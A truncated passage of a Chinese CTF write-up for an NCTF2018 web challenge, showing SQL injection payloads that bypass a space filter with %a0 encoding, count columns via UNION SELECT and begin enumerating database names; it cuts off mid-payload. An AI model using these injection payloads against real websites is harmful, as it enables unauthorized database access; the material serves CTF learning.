NCTF2018部分題WP(2)

第一題:滴!晨跑打卡 這道題過濾了空格,但是可以使用url編碼來繞過,這裏我們可以使用%a0,也就是加號來繞過。 首先查列數: 編碼:1%27%a0union%a0select%a01,2,3%27# 很明顯可以查出是三列。 然後就是查數據庫名: 編碼:id=1%27%a0union%a0select%a01,(SELECT%a0GROUP_CONCAT(SCHEMA_NAME)%a0FROM%a
相關文章
相關標籤/搜索